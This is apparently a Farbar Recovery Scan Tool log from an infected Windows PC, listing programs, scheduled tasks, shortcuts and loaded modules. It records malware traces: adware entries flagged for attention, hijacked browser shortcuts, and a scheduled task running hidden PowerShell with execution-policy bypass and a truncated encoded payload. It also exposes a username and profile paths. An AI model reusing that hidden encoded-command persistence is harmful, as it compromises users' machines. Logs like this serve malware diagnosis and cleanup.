Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version: - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 2.0.1 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 2.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3.6326 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
Desktop-play 000.015020180 (HKLM-x32\...\dply_en_015020180_is1) (Version: - DESKTOPPLAY) <==== ATTENTION
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.292.3 - McAfee, Inc.)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PhraseProfessor (HKLM-x32\...\{392277E3-5CF0-4F20-8BB5-F360D0DE4B41}) (Version: 2.0.0.490 - Phrase Professor) <==== ATTENTION
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version: - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {13815AA9-590B-4C49-9953-A7B006907A7C} - System32\Tasks\{D1996BD7-8FB6-7614-566B-6FE1DB83922B} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {623470E2-C48A-4E52-A1DF-F77930E10D52} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {650AE430-76EB-45EE-9683-D326DBD65FEA} - System32\Tasks\{7E7E0F47-097E-080A-0911-0E7E057A117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9372 more characters).
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\Program Files\Phrase Professor191220150009\Aluts.bat [2015-12-18] ()
Task: {D86DF6B7-284C-409B-9B28-1DD55045DF4E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,

==================== Loaded Modules (Whitelisted) ==============

2015-12-18 17:45 - 2015-12-18 16:11 - 00375144 _____ () C:\WINDOWS\system32\Qacsauol64.dll
2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2015-12-18 16:11 - 2015-12-18 16:11 - 00178536 _____ () C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-01-21 16:45 - 2009-01-21 16:45 - 01401856 _____ () C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\LIBEAY32.dll
2015-07-09 17:11 - 2013-03-25 09:57 - 00727952 _____ () C:\WINDOWS\SysWOW64\WSCM64.dll
2013-06-07 05:16 - 2013-06-07 05:16 - 04073768 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 06:11 - 2016-02-29 09:24 - 00227712 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
2016-01-13 06:11 - 2016-02-29 09:24 - 00285568 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
2016-01-12 12:12 - 2016-01-04 19:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 12:12 - 2016-01-04 19:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 17:28 - 2016-01-15 23:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 17:28 - 2016-01-15 23:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-03-03 20:46 - 2016-03-03 20:50 - 00016384 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2016-03-03 20:46 - 2016-03-03 20:50 - 16062976 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2016-03-03 20:46 - 2016-03-03 20:54 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2015-12-19 20:59 - 2015-12-19 20:59 - 00064512 _____ () C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Microsoft.CloudExperienceHost.dll
2016-03-07 10:34 - 2016-03-07 10:35 - 00015360 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.exe
2016-03-08 08:53 - 2016-03-08 08:53 - 00013824 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2016-03-08 08:53 - 2016-03-08 08:53 - 06197760 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll
2015-10-30 01:18 - 2015-10-30 01:18 - 02100064 _____ () C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2013-11-04 10:17 - 2012-06-07 21:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 11:34 - 2012-06-08 11:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-10-28 11:22 - 2014-10-28 11:22 - 40622592 ____R () C:\Program Files (x86)\Fitbit Connect\libcef.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00344448 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebugDll_win32.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00434560 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebug.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00467328 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWUtils.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 32689536 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWExternLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00299392 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib_win.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 06182784 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 07427456 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWApplication.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 13638016 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 02259840 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLibData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00353664 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\Kwift_DP.4.1.0.99957.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2016-03-07 10:34 - 2016-03-07 10:35 - 12646400 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.dll
2015-09-09 06:59 - 2015-09-09 06:59 - 00645120 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Aria.ClientTelemetry.dll
